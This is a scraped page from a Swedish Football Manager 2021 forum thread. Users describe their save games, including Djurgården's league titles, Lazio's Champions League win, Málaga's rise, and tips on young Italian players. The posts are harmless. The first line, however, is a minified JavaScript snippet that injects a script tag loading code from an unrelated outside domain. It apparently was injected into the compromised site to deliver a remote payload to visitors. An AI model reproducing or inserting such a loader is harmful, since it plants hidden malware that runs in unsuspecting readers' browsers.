;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Vilket lag är du? Hur går det? – Sida 6 – Football Manager 2021 – FMSweden Forum
Meny Stäng

Vilket lag är du? H...

Share:
Notifications
Clear all

Vilket lag är du? Hur går det?

324 Inlägg
79 Users
472 Reactions
22.8 K Visningar
Argt Troll
(@argt-troll)
Reputable Member

DJURGÅRDENS IF | SÄSONG 2

ÖVERGÅNGAR | 8 IN - 17 MILJ | 9 UT - 68.35 MILJ
BESARD SABOVIC, MJÄLLBY, 5.5 MILJ | ALBERT TJÅLAND, MOLDE, 4.75 MILJ | AXEL WALLENBORG, BP, 3 MILJ | ALBION ADEMI, IFK MARIEHAMN, 2 MILJ | OSKAR FALLENIUS, BP, 1.75 MILJ | ISAK PETTERSSON, IFK NORRKÖPING, GRATIS | SIMON THERN, IFK NORRKÖPING, GRATIS | STEFANO VECCHIA, SIRIUS, GRATIS

ELVAN | 4231 | OFFENSIVT
PETTERSSON | WITRY - BERG - UNE LARSSON - KÄCK | SABOVIC - ANDERSSON | CHILUYFA - ERIKSSON - VECCHIA | SELMANI

Inför min andra säsong i klubben så visste jag att det kunde ske en del förändringar på spelarfronten. Dels behövde laget breddas och sedan inträffade en del nyheter kring DIF irl, där bland annat Jesper Karlström och Jonathan Augustinsson lämnade föreningen. Detta gjorde att jag beslutade mig för att skicka iväg denna duo till Krasnodar respektive Brighton för totalt 49 miljoner. I övrigt lämnade bland annat Bärkroth, Nyholm, Bråtveit och Ulvestad klubben, medan några talanger fick lånas ut. En av dessa var nyförvärvet Fallenius som omgående lånades ut till Sirius i Allsvenskan, där det skulle visa sig bli en stor succé med 24 poäng på 24 matcher. Även Haalands kusin Tjåland lånades ut omgående till Allsvenskan men till nykomlingen Akropolis, där det för övrigt blev 9 poäng på 22 matcher. 

Jag hade närmare 200 miljoner att lägga på övergångar men valde istället att låta pengarna ligga lugnt hos banken. Samtidigt; får man chansen att ta in spelare som Vecchia och Pettersson som bosmans så finns det ingen anledning att lyfta på plånboken. Den förstnämnda hade lite skadeproblem under året men lyckades ändå göra 13 mål och 2 assist på 18 framträdanden och är numera svensk A-landslagsman. Föga förvånande jagas han redan nu av betydligt större klubbar.

ALLSVENSKAN | Mästare | 73 poäng | +38

I år var det inget snack om saken. Vi joggar hem ligan med elva poäng ned till fjolårets vinnare Hammarby. Sedan tog vi även hem Svenska Cupen-titeln efter en 3-2-vinst mot GIF Sundsvall efter förlängning. Om jag istället ska se till spelarprestationerna under ligaåret så är det främst bakåt det sticker ut.  Erik Berg hade ett snitt på sanslösa 7.53 och där mittbackskollegan Une-Larssons 7.37 inte heller är fy skam. Isak Petterssons 13 nollor tillsammans med Witry och Käcks 8 respektive 7 framspelningar förtjänar även att omnämnas. Framåt stod den tidigare nämnda Vecchia för en del poäng, där endast Astrit Selmani var strået vassare med hela 19 mål och 5 assist på 29 ligamatcher.

EUROPA LEAGUE II | Ut i play-off pga bortamål

I och med andraplatsen i fjol blev det inget Champions League-kval denna säsong. Istället väntade Europa League II-kval där vår målsättning inte bara var att ta oss till gruppspel utan även att gå långt i turneringen. Därav får man bara sammanfatta vårt deltagande som ett enda stort fiasko. Detta då vi redan i play-off åkte ut mot Sparta Prag efter 6-6 totalt men med mindre bortamål. Ska sägas att vi ledde med 4-2 hemma mot tjeckerna i den 93:e spelminuten men på något svårbegripligt sätt lyckades tappa in två mål.

VAD HÄNDER HÄRNÄST?

Nu stundar en vinter full av scouting. Dels ska jag sondera terrängen efter intressanta ungdomar inom Norden då våra egna intressanta ungdomskandidater lyst med sin frånvaro. Sedan ska jag försöka spetsa till truppen något inför sommarens Champions League-kval, där vi givetvis siktar in oss på gruppspelet. I övrigt handlar det som alltid om att förbättra övriga organisationen när det kommer till personal och faciliteter. 

Nillie reacted
SvaraCitera
(@maverick82)
Active Member

Postad av: @hypno

Betan rullar på för fullt, så det är väl hög tid att introducera tråden även för denna upplaga.

Själv spelar jag med IFK Norrköping. Vann Allsvenskan 2020 tack vare starkt försvarsspel (23 insläppta) och en glödhet Nyman (23 mål). Dagerstål vann snittbetygsligan medan Jonathan Levi blev utsedd till årets svenska mittfältare. Får även skicka en blombukett till IFK Göteborg, då dessa hade guldet i sina händer innan de sjabblade bort det genom att torska hemma både mot Falkenberg och Helsingborg så att jag kunde gå förbi i slutomgången...

Befinner mig i februari 2021 och har inte sålt en enda spelare hittills till kommande säsong, men Isak Pettersson har lämnat på fri transfer (inlagt i spelet från början att han lämnar när kontraktet går ut). Accepterade ett bud på 40 mkr från Brighton för Dagerstål, men han nobbade engelsmännen (och blev sur på att jag ens accepterade budet). Fokuserar likt Peking IRL på nordiska spelare, men drar det ett steg längre och kommer enbart värva nordiska spelare i saven. Toppad elva inför nästa säsong;

Mål: Otso Virtanen, 26 - NY för 0:- från KuPS

WB: Axel Björnström, 25 - NY för 7 000 000:- från Sirius
CB: Lars Gerson, 30
CB: Manasse Kusu, 19
CB: Filip Dagerstål, 23
WB: Linus Wahlqvist, 24

CM: Alexander Fransson, 26
CM: Simon Thern, 28

W: Sead Haksabanovic, 21
A: Christoffer Nyman, 28
W: Jonathan Levi, 24

Andra nyförvärv;
Elias Andersson för 0:- från Sirius
Stefano Vecchia för 1 500 000:- från Sirius
Albert Braut Tjåland för 8 000 000:- från Molde
Astrit Selmani för 4 250 000:- från Varberg

Ja, jag har rensat Sirius. 

Skulle man kunna få din taktik, uppställning?

SvaraCitera
Okocha
(@okocha)
Active Member

Precis nått avancemang med Bari till Serie B

Tjåland har blivit klubbens yngste målskytt i historien och nyckelspelarna är Capitano Mirco Antenucci, Kalle Björklund (grym värvning) och Marco Perrotta. Inför första säsongen i Serie B har gamle landslagsmålvakten Fede Marchetti tagits in på free transfer. Då Antenucci plötsligt fick för sig att hänga upp skorna så letar jag en erfaren målskytt! Där är jag nu

This post was modified 4 år sedan by Okocha

SvaraCitera
(@impedito)
New Member

@okocha

Hallå! Kul att höra om din resa i det Italienska seriesystemet. 

Kan varmt varmt varmt rekommendera Christian Capone och Roberto Piccoli till Serie B. Ena riktiga monster på Serie B nivå, i alla fall min erfarenhet. 

Följer Baritråden med spänning!

SvaraCitera
Bergkampf
(@bergkampf)
Active Member

Kör med Lazio. Inne på min andra säsong.

Första säsongen slutade mirakulöst nog med en CL-vinst där jag mötte Man Utd i finalen där vi blev utspelade till stora delar av matchen, lyckades få matchen till straffar där vi kom ut på topp. Vi slutade 3:a i ligan och åkte ut i semifinalen i italienska cupen mot Torino.

I början av andra säsongen så vann vi supercupen mot Leicester.

Spelare:

Immobile, var något av en besvikelse första säsongen då han bara mäkta med 18 mål på 38 ligamatcher, 31 mål på 55 matcher totalt under säsongen. Dock så har han verkligen vaknat till liv nu på min andra säsong med Lazio. 19 mål på 15 ligamatcher, 22 mål på 22 matcher totalt.

Strakosha, oehört stabil mellan stolparna. Rädda mig flertal gånger under säsongens gång, speciellt i finalen mot Utd där han stod för 2 straffräddar. Totalt så höll han nollan 31 gånger på 52 matcher med 27 insläppta. I ligan blev det 24 nollor på 38 matcher med 19 insläppta.

Acerbi, generalen i min 3-backslinje stabil hela säsongen.

Lucas, var stabil i sin roll som DLP under hela säsongen.

Savic, var stabil, men hade hoppats på mer mål från hans sida. Men han har redan gottgjort sig nu under andra säsongen. Första säsongen slutade med 31 ligamatcher och 3 mål. Nu har han spelat 15 ligamatcher och gjort 11 mål.

Luis Alberto, gjorde sitt jobb som den playmaker han är. Fina genomskärare och härliga crossbollar ut till mina wingbacks, precis sånt jag vill se från min playmaker.

Transfers:

Första säsongen tog jag in Matias Arezo för 24 mil och Roberto Gagliardini för 75 mil då.

Andra säsongen så anslöt Donnarumma och Eric Garcia på free transfer. Köpte även Josha Vagnoman för 70 mil. Tonali är även på väg in i klubben, fick honom för 230 mil. 

Några höjdpunkter från första säsongen, bäst Rom med en vinst och en oavgjord match, 4-0 seger hemma mot Juve, Atalanta tog hem Serie A och givetvis vår seger i CL.

I andra är några av höjdpunkterna att vi vann supercupen, leder Serie A för tillfället och en 7-1 seger mot Crotone där Immobile bomba in 5 mål och en seger hemma mot Milan där Immobile gav mig det vinnande målet i 90:e matchminuten.

SvaraCitera
Okocha
(@okocha)
Active Member

@impedito Tack för fin respons, skall kika på Capone (Bra namn också :P) Piccoli har jag bra koll på, helt klart fina alternativ. Samma resa som Sassuolo är målbilden, Mallen!

This post was modified 4 år sedan by Okocha

SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

Malaga CF

20/21: 9a i la liga 2

21/22: 1a i la liga 2, vinnare av copa del Rey

22/23: 14e i la liga

23/24: 5a i la liga

24/25: 3a i la liga

25/26: Halva säsongen avklarad och vi ligger 2a i la liga. Tyvärr så blev vi utslagna i en CL grupp bestående av Monaco, Ajax, och Tottenham. Det sistnämnda laget, fortfarande ledda av José Mourinho, har blivit något av vår nemesis då de år in och år ut slår ut oss ur cupspelet. Mourinho kör med sina jävla mind games, är så trött på gubben. Det blir väldigt hektiskt varje gång vi ska mötas, och fick äntligen min första seger mot Tottenham i gruppspelet. Trots 7p så slutade vi sist i gruppen. 

I ligan har det där emot gått bättre. Vi blir hetare och hetare för varje år som går, men i år är Barcelona obesegrade och leder ligan med 10p när halva säsongen är avklarad. 

Det som hittills har varit kul med Malaga är att vi får in en hel drös med intressanta ungdomsspelare varje år. Intagen har bestått av antingen "en bra grupp av unga spelare", eller "gyllene generation", vilket faktiskt har varit lite missledande. Dock så har det varit ett par unga spelare som har potentialen att bli a-lagsspelare inom ett par säsonger. 

Vidare så gick jag från min 4-2-3-1 gegenpress till min 5-2-1-2 uppställning som jag fick till så fina resultat med Lazio på betan, detta efter säsongen då vi nästan ramlade ur la liga. Jag kände att vi inte hade tillräckligt med bra spelare för att lira gegenpress, men snabba nog att köra med denna underbara kontringstaktik. 

En annan intressant grej som hände - jag tjatade år in och år ut på att höja lönerna för mina juniortränare, men styrelsen vägrade. Gav dom tillslut ett ultimatum, och tre år senare så har vi nu en "utmärkt juniororganisation", en "exceptionell ungdomsrekrytering", samt en "ungdomsanläggning i absoluta världsklass". 

Sist men inte minst - speed (acceleration och fart) är så sjukt OP på denna version av spelet. Många av er visste säkert redan, men för er som inte vet... nu vet ni! 

pizarro reacted
SvaraCitera
(@pizarro)
Eminent Member

Rekommenderar att ni följer min resa med Albacete i spanska andra divisionen. Finns att läsa i berättelseforumet. 

https://fmsweden.se/forum/rapporter/albacete-balompie-den-spanska-satsningen/

SvaraCitera
@d@m
 @d@m
(@dm)
Eminent Member

Spelar med Brage e lagé. Lyckades äntligen med en taktik och fick till ett passningsfokuserat spel med en 4-2-3-1 vilket har skördat framgångar. Inaktiverade transfern vid start. Halva serien spelad och jag leder tätt följd av Dalkurd och Degerfors. Signat Oliver Berg från Sundsvall på fri transfer till nästa säsong. Hoppas kunna hålla igång formen men åker på skada efter skada.

SvaraCitera
(@dif-daniel)
Active Member

Varje gång jag gör som min assisterande föreslår så går de åt helvete, varesig de är under match eller andra saker., folk vill lämna och matcher vänds emot mig. Tror han har en agenda.

raca14 reacted
SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@dif-daniel

Han vill bara få chansen som interim ? 

SvaraCitera
MaximTsigalko
(@maximtsigalko)
Eminent Member

Malaga CF

Äntligen Mästare!

Fy fan va skönt det känns att äntligen får kröna sig själv som mästare. 

Det har gått extremt lång tid sedan den där cup vinsten, och efter denna så har vårat troféskåp stått och samlat damm. Säsongen 27/28 blev nu säsongen som förändrade allt! 

Vi lyckades med att vinna supercupen där vi slog Real Madrid i semi-finalen, samt Barcelona i finalen. 

I ligan så blev det ett tremanna race mellan just Real, Barca, och Malaga. Vi vann ligan i sista omgången då vi hamnade på lika många poäng som Barcelona (89p) medan Real Madrid slutade på 88p. 

Där emot har det gått sjukt segt i CL. Vi hamnar hela tiden i sjukt svåra grupper, och har inte lyckats ta oss vidare från gruppspelet en endaste gång. Det blir nästa mål då, att ta sig vidare från gruppen... och tillslut vinna hela CL. 

Sist men inte minst så vill jag bara dela med mig av min egna produkt. Kanske inte den bästa spelaren rent attributmässigt, men fy fan va bra han har varit i år, speciellt mot dom stora lagen. 15 mål och 19 assist som högerytter - Gregorio Hidalgo

SvaraCitera
friggan
(@friggan)
Estimable Member

Skaffade just FM21 och började spela med Italiens landslag. Fan vad mycket fina, unga spelare de har! Kan nog bli ett VM guld 2022 eller 2026 när de mognat till sig lite!

SvaraCitera
zXc
 zXc
(@zxc)
Estimable Member

@friggan

Vilka är mest spännande, enligt dig? ? 

SvaraCitera
friggan
(@friggan)
Estimable Member

@zxc

Jag vet inte riktigt ännu, men kollar man på landslaget så är ju otroligt många spelare under 23 år. Jag får känslan av Belgiens gyllene generation!

SvaraCitera
Argt Troll
(@argt-troll)
Reputable Member

DJURGÅRDENS IF | SÄSONG 3

ÖVERGÅNGAR | 10 IN - 65 MILJ | 9 UT - 152 MILJ
JÓN D. TORSTEINSSON, AGF, 27 MILJ | GUSTAV BERGGREN, NAPOLI, 16 MILJ | JOSEPH OKUMU, LAZIO, 13 MILJ | RAFAEL RATAO, SLOVAN BRATISLAVA, 600K | EMIL BERGSTRÖM, UTRECHT, GRATIS | 5 TALANGER  TILL U19, 9 MILJ

ELVAN | 4231 | OFFENSIVT
PETTERSSON | JONSSON - UNE LARSSON- OKUMU - WALLENBORG | BERGGREN - ANDERSSON | CHILUYFA - RATAO - TORSTEINSSON| SELMANI

Även denna säsong hade jag över 200 miljoner att lägga på spelartransfers, men där vi istället lämnade fönstrena med rätt stora överskott. Stefano Vecchia (Derby, 55 miljoner), Aslak Witry (Krasnodar, 46 miljoner), Simon Thern (Häcken, 15 miljoner), Kalle Holmberg (10 miljoner), Isak Hien (Torino, 7 miljoner), Albion Ademi (Molde, 6.75 miljoner) och Curtis Edwards (Boavista, 5.25 miljoner) tackade alla för sig och in fick vi en trio med ex-allsvenska klasslirare. Framförallt den gamla Elfsborgsbacken Joseph Okumu skulle visa sig bli en stor succé där han som i grädde på moset fick motta priset som Årets spelare i Allsvenskan. 

Annars gjorde de resterande värvningarna det helt okej, men jag har högre förväntningar på dessa till nästa år. Framförallt på Stefano Vecchias ersättare, Jón Dagur Torsteinsson, som mest gick runt och var missnöjd under säsongen. När islänningen väl var på humör så visade han dock varför vi behövde betala hela 27 miljoner för hans underskrift och vi får bara hoppas att han kan hålla humöret uppe under säsongen 2023. I övrigt var det otroligt kul att få hem urdjurgårdaren Emil Bergström som bosman. Han kommer bli viktig under kommande säsongerna.

ALLSVENSKAN | Mästare | 70 poäng | +46

Visserligen tar vi tre poäng färre än i fjol, men då det i övrigt saknades topplag så var dominansen i år total. Med hela 18 poäng ned till silvermedaljören Halmstads BK kunde vi säkra guldet redan i den 26:e omgången. Dubbeln kunde även tas för andra året i följd då vi besegrade Örebro SK i Svenska Cupens final. Bortsett från Joseph Okumu (20 matcher, 7.49) som helt enkelt var dominant så fort han beträdde planen, så var det inte några spelarstats som direkt stod ut i ligaspelet. Astrit Selmanis gjorde visserligen 16 mål på ynka 17 starter, men kommer att säljas i vinter. Givetvis inte för dåliga prestationer utan för att han tagit ett miserabelt karriärsteg irl. 

Ligan har efter två identiska säsonger äntligen klättrat på ligarankingen där Allsvenskan nu huserar på en 16:e-plats i Europa. En förbättring med åtta placeringar.

Champions League | 4:a i gruppen

Vi lyckades utan några som helst bekymmer med målsättningen att nå Champions Leagues gruppspel, där vi ställdes mot de två lagen från Red Bull-koncernen Leipzig och Salzburg, men även genuina och härliga Benfica. Dessvärre blev det 6/6 förluster, men jag tycker ändå vi ska lämna turneringen med raka ryggar. Fem av matcherna förlorades med uddamålet, där tre utav dessa var i slutminuterna. Lite smått bittert, men samtidigt skiljer det flera nivåer mellan oss kvalitetsmässigt. 

VAD HÄNDER HÄRNÄST?

Med nästan en halv miljard på banken har vi alla förutsättningar till att fortsätta satsa vidare för att bli den klubben som sätter nordisk fotboll på den stora fotbollskartan. Faciliteter förbättras ständigt och kommer så även att göras tills de håller en världsklass. Sett till spelartransfers blir det troligtvis en lugn vinterperiod. Jag har i dagsläget inga större planer på att varken ta in eller sälja mer än ett fåtal spelare. Men lyckas jag hitta nordiska spelare att spetsa startelvan med så finns chansen att jag agerar.

Målsättningen till nästa säsong blir givetvis att vinna Allsvenskan för tredje året i följd och ta oss in till Champions League. Väl där i ett eventuellt gruppspel hoppas jag på bättre utdelning i resultatkolumnen. 

friggan, The Gustine and zXc reacted
SvaraCitera
(@pcch7)
Trusted Member

Första saven va med Atalanta, är inne på femte eller sjätte säsongen tror jag. Men jag började en med Liverpool som jag håller på med nu, är i slutet på första säsongen. Vinner ligan, vann community shield. Ska spela CL final mot Juve, men det roligaste med den här saven är att Leeds kniper en CL plats. Kommer sluta 2a eller 3a, och det ser ut some Leicester blir 4a.

Nu vann Leeds även FA cupen

This post was modified 4 år sedan by pcch7

friggan reacted
SvaraCitera
friggan
(@friggan)
Estimable Member

@zxc

Okej här kommer de i Italien jag tror mycket på!

Insigne, Immobille och Belotti har alla många år kvar och garanterar mål. Veratti är given många år framöver. Men om man ser på talangfabriken (där samtliga har spelat en hel del i a-landslaget redan) så tycker jag dessa spelare ser riktigt spännande ut!

• Barella, född 1997
  • Locatelli, född 1998
  • Bastoni, född 1999
  • Donnarumma, född 1999
  • Tonali, född 2000
  • Kean, född 2000
  • Chiesa, född 1997
  • Zaniolo, född 1999

zXc reacted
SvaraCitera
(@pcch7)
Trusted Member

@friggan Lovato från Hellas Verona blir mycket bra. Rovella från Genoa blir fin han med med lite utveckling.

SvaraCitera
friggan
(@friggan)
Estimable Member

@pcch7

Sedär ja! Ska bli spännande att se vad de har för lag om ett par år!

SvaraCitera
Sida 6 / 17
Share: